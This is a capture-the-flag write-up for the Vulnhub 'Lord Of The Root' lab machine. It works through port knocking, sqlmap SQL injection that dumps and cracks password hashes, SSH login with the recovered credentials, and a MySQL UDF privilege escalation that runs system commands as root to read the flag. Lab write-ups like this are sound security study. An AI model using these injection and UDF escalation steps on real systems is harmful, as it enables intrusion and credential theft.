Vulnhub - Lord Of The Root

Author: adi7312

Host scanning

We start this CTF with scanning a vulnerable machine with command below:

nmap -sT -A

We can see that vulnerable host has opened port 22 (ssh). Let’s try connect to that machine via ssh.


We cannot of course login via ssh, because we don’t know password, but we got a hint - we should knock the host at 1st, 2nd and 3rd port.

We can do that with the following script:


for ARG in "$@"
    nmap -Pn --host-timeout 201 --max-retries 0 -p $ARG $HOST

After launching it (./ 1 2 3) we can scan the host again.

We can see that there is open http port with Apache server running on it.

Investigation of Apache Server

First what we can do is to investsigate robots.txt file, but when we open site with it, we can find only some picture.

But let’s take a look at source code. We can find some interesting string that seems to be encoded in Base64.

Let’s try to decode it.

Let’s decode it again.

As a result we got some interesting directory with index.php file, let’s move into it.

We can use sqlmap to check if this site is vulnerable to SQLi.

Let’s run the command below:

sqlmap -o -u "" --forms --dbs

As we can see, we got 4 databases, so this site is vulnerable to SQLi!

Let’s get tables for Webapp db.

sqlmap -o -u "" --forms -D Webapp --tables

Let’s get columns of that table

sqlmap -o -u "" --forms -D Webapp -T Users --columns

Now it’s time for dumping passwords:

sqlmap -o -u "" --forms -D Webapp -T Users -C id,username,password --dump

Now we should dump mysql db, we repeat all commands above, but for mysql db.

I made mistake during dumping passwords so I needed to check user column with other command (hash A55… is related to debian-sys-maint).

During dumping password sqlmap offered to perform dictionary attack on that hashes, I agreed on that and the program cracked that hash. So password to root account is darkshadow.

Further enumeration

Now we can login to machina via ssh.

ssh smeagol@
Password: MyPreciousR00t

In / directory we can find some interesting directory named SECRET, it has 3 directories called doors.

When I tried to run this file it turned out that it needs some input, immidiately I thought about Buffer Oveflow, so I provided some garbage data and I was right!

But what is interesting, I could do it only once! Something was watching that file and it didn’t allow for further overflowing the buffer. So maybe I should took another way, for example I still have username and password to mysql. Let’s check if mysql is running with ps aux | grep mysql. Not only it is running, it is running with root privileges! After some research I figured out that there is method for priv esc with mysql.

Privilege Escalation

I used exploit from this site. I saved C programm into raptor2_udf2.c file. Now we need to compile it and use it.

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname, -o raptor_udf2.o -lc
mysql -u root -p
Password: darkshadow

mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/smeagol/'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/';
mysql> create function do_system returns integer soname '';
mysql> select * from mysql.func;

I followed the instructions in exploit and now we can read the root flag!

mysql> select do_system('cat /root/Flag.txt > /tmp/out; chmod 777 /tmp/out');
mysql> \! cat /tmp/out

Flag: “There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.” – Gandalf